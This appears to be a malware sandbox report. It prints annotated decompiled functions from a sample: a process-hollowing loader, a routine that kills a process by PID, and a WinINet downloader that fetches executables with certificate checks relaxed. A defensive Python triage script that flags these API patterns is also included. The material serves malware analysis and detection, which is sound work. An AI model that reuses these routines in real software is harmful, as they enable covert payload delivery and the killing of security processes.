                                                                                                                                          0x00000000
                                                                                                                                          0x00405926
                                                                                                                                          0x00405928
                                                                                                                                          0x00405928
                                                                                                                                          0x00405930
                                                                                                                                          0x00405934
                                                                                                                                          0x00405944
                                                                                                                                          0x00405948
                                                                                                                                          0x00405958
                                                                                                                                          0x0040595d
                                                                                                                                          0x0040595f
                                                                                                                                          0x00000000
                                                                                                                                          0x00405965
                                                                                                                                          0x0040596e
                                                                                                                                          0x00405985
                                                                                                                                          0x0040598a
                                                                                                                                          0x0040598c
                                                                                                                                          0x00000000
                                                                                                                                          0x00405992
                                                                                                                                          0x00405995
                                                                                                                                          0x0040599f
                                                                                                                                          0x004059b9
                                                                                                                                          0x004059bb
                                                                                                                                          0x004059bd
                                                                                                                                          0x004059c7
                                                                                                                                          0x004059dc
                                                                                                                                          0x004059e2
                                                                                                                                          0x004059ef
                                                                                                                                          0x004059ef
                                                                                                                                          0x004059fe
                                                                                                                                          0x00405a03
                                                                                                                                          0x00405a05
                                                                                                                                          0x00405a08
                                                                                                                                          0x00405a0a
                                                                                                                                          0x00405a0d
                                                                                                                                          0x00405a0d
                                                                                                                                          0x00405a13
                                                                                                                                          0x00405a16
                                                                                                                                          0x00405a18
                                                                                                                                          0x00405a1b
                                                                                                                                          0x00405a1b
                                                                                                                                          0x00405a2a
                                                                                                                                          0x00405a30
                                                                                                                                          0x00405a38
                                                                                                                                          0x00405a3e
                                                                                                                                          0x00405a43
                                                                                                                                          0x00405a4c
                                                                                                                                          0x00405a4c
                                                                                                                                          0x0040598c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x0040583c
                                                                                                                                          0x00405844
                                                                                                                                          0x00405846
                                                                                                                                          0x00405849
                                                                                                                                          0x0040584c
                                                                                                                                          0x0040584e
                                                                                                                                          0x00000000
                                                                                                                                          0x00405854
                                                                                                                                          0x00405854
                                                                                                                                          0x0040585c
                                                                                                                                          0x0040585e
                                                                                                                                          0x00405860
                                                                                                                                          0x00405862
                                                                                                                                          0x00405865
                                                                                                                                          0x00405867
                                                                                                                                          0x00000000
                                                                                                                                          0x0040586d
                                                                                                                                          0x0040586d
                                                                                                                                          0x0040586f
                                                                                                                                          0x00405871
                                                                                                                                          0x004058a8
                                                                                                                                          0x004058a8
                                                                                                                                          0x00000000
                                                                                                                                          0x00405873
                                                                                                                                          0x00405873
                                                                                                                                          0x00405873
                                                                                                                                          0x00405875
                                                                                                                                          0x0040587f
                                                                                                                                          0x0040587f
                                                                                                                                          0x00405877
                                                                                                                                          0x00405877
                                                                                                                                          0x00405877
                                                                                                                                          0x00405883
                                                                                                                                          0x00405889
                                                                                                                                          0x0040588b
                                                                                                                                          0x0040588d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405893
                                                                                                                                          0x00405896
                                                                                                                                          0x00405899
                                                                                                                                          0x0040589c
                                                                                                                                          0x0040589f
                                                                                                                                          0x004058a1
                                                                                                                                          0x00000000
                                                                                                                                          0x004058a3
                                                                                                                                          0x004058a3
                                                                                                                                          0x00000000
                                                                                                                                          0x004058a3
                                                                                                                                          0x00000000
                                                                                                                                          0x004058a1
                                                                                                                                          0x00000000
                                                                                                                                          0x00405873
                                                                                                                                          0x00405871
                                                                                                                                          0x00405867
                                                                                                                                          0x00000000
                                                                                                                                          0x0040584e
                                                                                                                                          0x004057a0
                                                                                                                                          0x004057a7
                                                                                                                                          0x00000000
                                                                                                                                          0x004057a7
                                                                                                                                          0x0040579e
                                                                                                                                          0x0040578a
                                                                                                                                          0x00405771
                                                                                                                                          0x00405748
                                                                                                                                          0x00405718
                                                                                                                                          0x004056e8
                                                                                                                                          0x004056c1
                                                                                                                                          0x00405696
                                                                                                                                          0x0040567a
                                                                                                                                          0x0040566b
                                                                                                                                          0x0040564d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405577
                                                                                                                                          0x00405571
                                                                                                                                          0x0040554e
                                                                                                                                          0x0040551c
                                                                                                                                          0x0040551c
                                                                                                                                          0x0040551c
                                                                                                                                          0x00000000

APIs
• CreateProcessW.KERNEL32 ref: 0040550E
• GetThreadContext.KERNEL32(?,?,I@,00000000,?,?,?,?,?,?), ref: 00405546
• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 0040556D
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00405588
• CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00405597
• CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0040559C
• NtClose.NTDLL(00000000), ref: 004055A6
• NtClose.NTDLL(00000000), ref: 004055B4
• GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055C4
• GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055D6
• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 00405614
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00405707
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405737
• VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405780
• ReadProcessMemory.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040579A
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?), ref: 004057A7
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004057C7
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00405883
                                                                                                                                          • Sleep.KERNEL32(00001388,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,?,00000000,00000000), ref: 0040599F
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004), ref: 004059B3
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,00000000,00000138,?), ref: 004059EF
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004059FE
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A03
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00405A0D
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00405A1B
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00405A2D
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 00405A3B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$Close$Current$Virtual$Handle$FreeMemoryRead$Alloc$AddressContextCreateProcSleepTerminateThread
                                                                                                                                          • String ID: 0125789244697858$D$h$n0@$I@
                                                                                                                                          • API String ID: 937709717-631519299
                                                                                                                                          • Opcode ID: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
                                                                                                                                          • Instruction ID: 0427067da74405bbc224276ff2be7b89c7662c3791b2ba589faee8c975da3b6f
                                                                                                                                          • Opcode Fuzzy Hash: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
                                                                                                                                          • Instruction Fuzzy Hash: CF124971E00609ABEB20DB94DD45FAFBBB9EF04704F144166FA04B72D1E778AD448B68
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00408823
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 0040887E
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004088A0
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004088AD
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004088B9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseFilePath$CreateNameName_Write
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 589302162-0
                                                                                                                                          • Opcode ID: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
                                                                                                                                          • Instruction ID: cdde318fc824664ac6a874490e4e1e0a00434436370c8205e3f3d3f15e695731
                                                                                                                                          • Opcode Fuzzy Hash: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
                                                                                                                                          • Instruction Fuzzy Hash: D5310CB1D4020DBBEB10DF90DD49BEEBBB8EB04704F20415AF904B62D0D7B566589F99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			// Opens the process whose PID is passed in _a4 with PROCESS_TERMINATE (0x1) only,
                                                                                                                                          			// kills it through NtTerminateProcess and returns 1 on success, 0 on any failure.
                                                                                                                                          			// _v40.._v20 form an OBJECT_ATTRIBUTES (24 bytes) and _v16/_v12 a CLIENT_ID.
                                                                                                                                          			E00408730(char _a4) {
                                                                                                                                          				void* _v8;          // ProcessHandle written by NtOpenProcess
                                                                                                                                          				intOrPtr _v12;      // CLIENT_ID.UniqueThread (0)
                                                                                                                                          				void* _v16;         // CLIENT_ID.UniqueProcess (target PID)
                                                                                                                                          				intOrPtr _v20;      // OBJECT_ATTRIBUTES.SecurityQualityOfService
                                                                                                                                          				intOrPtr _v24;      // OBJECT_ATTRIBUTES.SecurityDescriptor
                                                                                                                                          				intOrPtr _v28;      // OBJECT_ATTRIBUTES.Attributes
                                                                                                                                          				intOrPtr _v32;      // OBJECT_ATTRIBUTES.ObjectName
                                                                                                                                          				intOrPtr _v36;      // OBJECT_ATTRIBUTES.RootDirectory
                                                                                                                                          				void* _v40;         // OBJECT_ATTRIBUTES.Length
                                                                                                                                          				void* _t23;
                                                                                                                                          				void* _t25;
                                                                                                                                          				void* _t29;
                                                                                                                                          
                                                                                                                                          				_t1 =  &_a4; // 0x404a23
                                                                                                                                          				_v16 =  *_t1;                       // ClientId.UniqueProcess = PID argument
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v40 = 0x18;                        // sizeof(OBJECT_ATTRIBUTES) on x86
                                                                                                                                          				_v36 = 0;
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_v32 = 0;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_v20 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				// DesiredAccess = 1 = PROCESS_TERMINATE: the minimum right needed to kill the target
                                                                                                                                          				if(NtOpenProcess( &_v8, 1,  &_v40,  &_v16) == 0) {
                                                                                                                                          					_t23 = _v8;
                                                                                                                                          					if(_t23 == 0) {
                                                                                                                                          						goto L1;
                                                                                                                                          					} else {
                                                                                                                                          						// Indirect call through a resolved pointer; the API list maps this
                                                                                                                                          						// call site (0040879D) to NtTerminateProcess(ProcessHandle, ExitStatus = 0).
                                                                                                                                          						// _t29 is a leftover register the decompiler shows as a third argument.
                                                                                                                                          						_t25 =  *0x5d10b0(_t23, 0, _t29);
                                                                                                                                          						NtClose(_v8);
                                                                                                                                          						return 0 | _t25 == 0x00000000;  // 1 if NtTerminateProcess returned STATUS_SUCCESS
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					L1:
                                                                                                                                          					return 0;
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000001,?,?), ref: 00408782
                                                                                                                                          • NtTerminateProcess.NTDLL(00000000,00000000), ref: 0040879D
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004087A8
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$CloseOpenTerminate
                                                                                                                                          • String ID: #J@
                                                                                                                                          • API String ID: 4223285941-3103836084
                                                                                                                                          • Opcode ID: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                                                          • Instruction ID: 8b2c6ad6389722ad4d186c6c61001f468c4fd018603b84c5e18b7e3fb15685ad
                                                                                                                                          • Opcode Fuzzy Hash: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                                                          • Instruction Fuzzy Hash: 5B010C71E0120CABDB10DFA0D948BDFBBF8EB04305F14419AE808F7280D7799A489BD5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
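The two API listings above (the CreateProcessW / GetThreadContext / ReadProcessMemory sequence of the loader, and the NtOpenProcess / NtTerminateProcess pair of E00408730) can be turned into a triage rule for reports in this format. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses the report's own "APIs" line format and flags the two patterns. The rule names, the heuristic that a 4-byte ReadProcessMemory right after GetThreadContext is a PEB image-base read typical of RunPE-style hollowing, and the SAMPLE text (lines copied from the listings above into a constructed input) are this example's assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One line of the report's API listing, e.g.
#   • NtOpenProcess.NTDLL(00000000,00000001,?,?), ref: 00408782
#   • CreateProcessW.KERNEL32 ref: 0040550E          (no argument list)
API_LINE = re.compile(
    r"^\s*\u2022?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list          # raw argument strings; '?' means unknown to the disassembler
    ref: int            # address of the call site


def parse_api_listing(text: str) -> list:
    """Parse an 'APIs' block into ApiCall records, keeping report order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"] or ""
        args = [a.strip() for a in raw.split(",")] if raw.strip() else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def arg_int(call: ApiCall, idx: int) -> Optional[int]:
    """Argument idx as an integer, or None if it is '?', a string, or absent."""
    if idx >= len(call.args):
        return None
    try:
        return int(call.args[idx], 16)
    except ValueError:
        return None


PROCESS_TERMINATE = 0x0001   # winnt.h access right; the only bit E00408730 asks for


def find_process_kill(calls):
    """NtOpenProcess requesting exactly PROCESS_TERMINATE, later followed by a
    terminate call: the 'open by PID and kill' primitive. Returns (open, kill) sites."""
    hits = []
    for i, c in enumerate(calls):
        if c.api == "NtOpenProcess" and arg_int(c, 1) == PROCESS_TERMINATE:
            for d in calls[i + 1:]:
                if d.api in ("NtTerminateProcess", "TerminateProcess"):
                    hits.append((c.ref, d.ref))
                    break
    return hits


def find_hollowing_prologue(calls):
    """CreateProcessW -> GetThreadContext -> ReadProcessMemory(nSize == 4), in order.
    Assumption: a 4-byte read immediately after fetching the child's thread context
    is the PEB image-base read a RunPE loader performs. Heuristic only, so the
    call-site addresses are returned for a human to confirm."""
    want = ("CreateProcessW", "GetThreadContext", "ReadProcessMemory")
    stage, refs = 0, []
    for c in calls:
        if c.api != want[stage]:
            continue
        if c.api == "ReadProcessMemory" and arg_int(c, 3) != 4:   # nSize is argument 3
            continue
        refs.append(c.ref)
        stage += 1
        if stage == len(want):
            return tuple(refs)
    return None


def analyze(text: str) -> dict:
    calls = parse_api_listing(text)
    return {
        "calls": len(calls),
        "hollowing_prologue": find_hollowing_prologue(calls),
        "process_kill": find_process_kill(calls),
    }


# Constructed sample: lines copied from the two API listings above, in report order.
SAMPLE = """
• CreateProcessW.KERNEL32 ref: 0040550E
• GetThreadContext.KERNEL32(?,?,I@,00000000,?,?,?,?,?,?), ref: 00405546
• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 0040556D
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00405588
• Sleep.KERNEL32(00001388,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,?,00000000,00000000), ref: 0040599F
• NtOpenProcess.NTDLL(00000000,00000001,?,?), ref: 00408782
• NtTerminateProcess.NTDLL(00000000,00000000), ref: 0040879D
• NtClose.NTDLL(00000000), ref: 004087A8
"""

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Both rules return call-site addresses rather than a verdict so the finding can be cross-checked against the decompiled function at that address; the TerminateProcess at 00405588 is deliberately not counted as a kill, since it is the loader cleaning up its own child rather than a foreign process opened by PID.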

                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			// strdup equivalent on the process heap: measures the NUL-terminated string
                                                                                                                                          			// at _a4, allocates len+1 bytes, copies it and returns the new buffer.
                                                                                                                                          			// Note the missing NULL check on the HeapAlloc result: on allocation failure
                                                                                                                                          			// the copy loop and the final terminator write go through a NULL pointer.
                                                                                                                                          			E00401800(intOrPtr* _a4) {
                                                                                                                                          				void* _t5;          // string length
                                                                                                                                          				void* _t8;          // new buffer (return value)
                                                                                                                                          				void* _t9;          // write cursor
                                                                                                                                          				void _t10;          // current character
                                                                                                                                          				intOrPtr* _t11;     // source string
                                                                                                                                          				void* _t12;         // source - destination delta used by the copy loop
                                                                                                                                          
                                                                                                                                          				_t11 = _a4;
                                                                                                                                          				_t5 = 0;
                                                                                                                                          				if( *_t11 != 0) {
                                                                                                                                          					do {
                                                                                                                                          						_t5 = _t5 + 1;                  // strlen
                                                                                                                                          					} while ( *((char*)(_t5 + _t11)) != 0);
                                                                                                                                          				}
                                                                                                                                          				_t8 = HeapAlloc(GetProcessHeap(), 0, _t5 + 1);
                                                                                                                                          				_t10 =  *_t11;
                                                                                                                                          				_t9 = _t8;
                                                                                                                                          				if(_t10 != 0) {
                                                                                                                                          					_t12 = _t11 - _t8;
                                                                                                                                          					do {
                                                                                                                                          						 *_t9 = _t10;                   // copy one byte
                                                                                                                                          						_t9 = _t9 + 1;
                                                                                                                                          						_t10 =  *((intOrPtr*)(_t12 + _t9)); // next source byte via the delta
                                                                                                                                          					} while (_t10 != 0);
                                                                                                                                          				}
                                                                                                                                          				 *_t9 = 0;                           // NUL terminator
                                                                                                                                          				return _t8;
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000001,?,?,004052B1,?), ref: 0040181B
                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,004052B1,?), ref: 00401822
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                          • Opcode ID: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                                                          • Instruction ID: b73465cae51e9fc63f2ab920ad57f2ce1bbeed3a8eb4a9efde1b3dbfd0151c34
                                                                                                                                          • Opcode Fuzzy Hash: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                                                          • Instruction Fuzzy Hash: ECF055320092909EEB222F3488443727FE99F0B344F1C84EED8C59B3A2D63B8D48C394
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Reads a handle kept in a global at 0x5d2df8 (0x41c in this dump) and closes it
			// via NtClose, skipping the call when the slot is NULL or INVALID_HANDLE_VALUE.
			E00406D50() {
				void* _t1;

				_t1 =  *0x5d2df8; // 0x41c
				if(_t1 != 0 && _t1 != 0xffffffff) { // 0xffffffff == INVALID_HANDLE_VALUE
					return NtClose(_t1);
				}
				return _t1;
			}





                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                          • Opcode ID: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                                                          • Instruction ID: 1cc971618bee3f163804a16a1d445a44e399e0157dcd427ad3a3562554af56f5
                                                                                                                                          • Opcode Fuzzy Hash: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                                                          • Instruction Fuzzy Hash: D6B0923070564157CE30AB38AC8CA1633685E6032132A0723F037E21E4EA38C8EAA61E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Same pattern as E00406D50 for the neighbouring global at 0x5d2dfc (0x420 here):
			// close the stored handle only if it is neither NULL nor INVALID_HANDLE_VALUE.
			E00406D70() {
				void* _t1;

				_t1 =  *0x5d2dfc; // 0x420
				if(_t1 != 0 && _t1 != 0xffffffff) { // 0xffffffff == INVALID_HANDLE_VALUE
					return NtClose(_t1);
				}
				return _t1;
			}





                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                          • Opcode ID: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                                                          • Instruction ID: 76f8495102a0d5e2d14eb48cf16d234cca2194880bcae08c05adfe453fa08bf3
                                                                                                                                          • Opcode Fuzzy Hash: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                                                          • Instruction Fuzzy Hash: F4B092307055815BCE70AB79AC4CA1633686E603213150723A83BE12E4EA38C8AEA62D
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 95%
			// WinINet downloader: parses the URL in _a4 with InternetCrackUrlA, issues a GET,
			// reads the body into a growing heap buffer, stores that buffer in *_a8 and returns
			// the byte count (0 on any failure). The E0040xxxx helper names are the decompiler's;
			// their roles in the comments below are inferred from how they are called here.
			E00407C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
				void _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t53;
				int _t54;
				void* _t62;
				void* _t63;
				void* _t72;
				long _t88;
				long _t103;
				char* _t108;
				intOrPtr _t109;
				char* _t111;
				void* _t114;
				long _t116;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				// _v112.._v56 is a URL_COMPONENTSA (0x3c = 60 bytes on 32-bit): zero everything
				// after dwStructSize, then set the *Length fields to -1 so InternetCrackUrlA
				// returns pointers into the original string plus their lengths.
				E00401BB0( &_v108, 0, 0x38); // memset-like
				_t108 = _a4;
				_v24 = 0;
				_t103 = 0; // running total of bytes received
				_v112 = 0x3c; // dwStructSize
				_v92 = 0xffffffff; // dwHostNameLength
				_v104 = 0xffffffff; // dwSchemeLength
				_v64 = 0xffffffff; // dwUrlPathLength
				_v56 = 0xffffffff; // dwExtraInfoLength
				_t53 = E00401850(_t108); // strlen-like: length of the URL
				_t125 = _t123 + 0x10;
				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
				if(_t54 != 0) {
					// Copy lpszHostName (_v96, length _v92) into a NUL-terminated buffer.
					_t111 = E004015E0(_v92 + 1); // malloc-like
					E00401BB0(_t111, 0, _v92 + 1);
					E00401640(_t111, _v96, _v92); // memcpy-like
					_t126 = _t125 + 0x1c;
					// Hard-coded User-Agent "WinInetGet/0.1": a usable string for network detection.
					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v20 = _t62;
					if(_t62 != 0) {
						// _v88 is nPort from the parsed URL; 3 == INTERNET_SERVICE_HTTP.
						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
						_v16 = _t63;
						_push(_t111);
						if(_t63 != 0) {
							E00401510(); // free-like: releases the hostname copy pushed above
							E004018D0(_t108, "https://"); // compares the URL against "https://" (helper semantics not shown)
							_t127 = _t126 + 0xc;
							// NULL-terminated accept-type list handed to HttpOpenRequestA via &_v52.
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							// The decompiler did not recover the condition; the two flag words differ only
							// in bit 0x00800000 (INTERNET_FLAG_SECURE), i.e. plain vs. TLS request flags.
							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0; // terminator of the accept-type list
							// _v68 is lpszUrlPath from URL_COMPONENTSA.
							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v12 = _t114;
							if(_t114 == 0) {
								L24:
								InternetCloseHandle(_v16);
								InternetCloseHandle(_v20);
								return 0;
							} else {
								_t72 = E004018D0(_t108, "https://"); // same "https://" check, result now used
								_t128 = _t127 + 8;
								if(_t72 == 0) {
									L10:
									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
										goto L23;
									} else {
										// Read loop: start with a 0x400-byte buffer and grow it in 0x400 steps.
										_t116 = 0x400;
										_t109 = E004015E0(0x400); // malloc-like
										_t129 = _t128 + 4;
										if(_t109 == 0) {
											_t114 = _v12;
											goto L23;
										} else {
											do {
												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
													if(GetLastError() != 0x7a) { // 0x7a == ERROR_INSUFFICIENT_BUFFER
														E00401510(_t109); // free-like: drop the partial body on a hard error
														L21:
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														return 0;
													} else {
														_t116 = _t116 + 0x400; // buffer too small: grow and retry
														goto L15;
													}
												} else {
													_t88 = _v24; // bytes read this iteration
													if(_t88 == 0) {
														// End of body: hand the buffer to the caller and return its length.
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														 *_a8 = _t109;
														return _t103;
													} else {
														_t103 = _t103 + _t88;
														goto L15;
													}
												}
												goto L25;
												L15:
												_t109 = E004016A0(_t109, _t116 + _t103); // realloc-like: make room for the next chunk
												_t129 = _t129 + 8;
											} while (_t109 != 0);
											goto L21; // reallocation failed
										}
									}
								} else {
									// 0x1f == INTERNET_OPTION_SECURITY_FLAGS; _v28 = 4 is the DWORD buffer size.
									_v8 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
										L23:
										InternetCloseHandle(_t114);
                                                                                                                                          										goto L24;
                                                                                                                                          									} else {
                                                                                                                                          										_v8 = _v8 | 0x00000180;
                                                                                                                                          										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
                                                                                                                                          											goto L23;
                                                                                                                                          										} else {
                                                                                                                                          											goto L10;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							E00401510();
                                                                                                                                          							InternetCloseHandle(_v20);
                                                                                                                                          							return 0;
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						E00401510(_t111);
                                                                                                                                          						return 0;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					return _t54;
                                                                                                                                          				}
                                                                                                                                          				L25:
                                                                                                                                          			}

APIs
• InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
• InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00407CCD
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Internet$CrackOpen
• String ID: GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
• API String ID: 1262293563-1634511642
• Opcode ID: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
• Instruction ID: 4be7173def1fabf2422f7d93ddf0ca221e4e961e0538c85c9162d68e93896e62
• Opcode Fuzzy Hash: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
• Instruction Fuzzy Hash: BD71E471E00209BBEB10AFA1ED45BAEBBB8EF44324F104176F904F62D1D7796D10CA99
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 82%
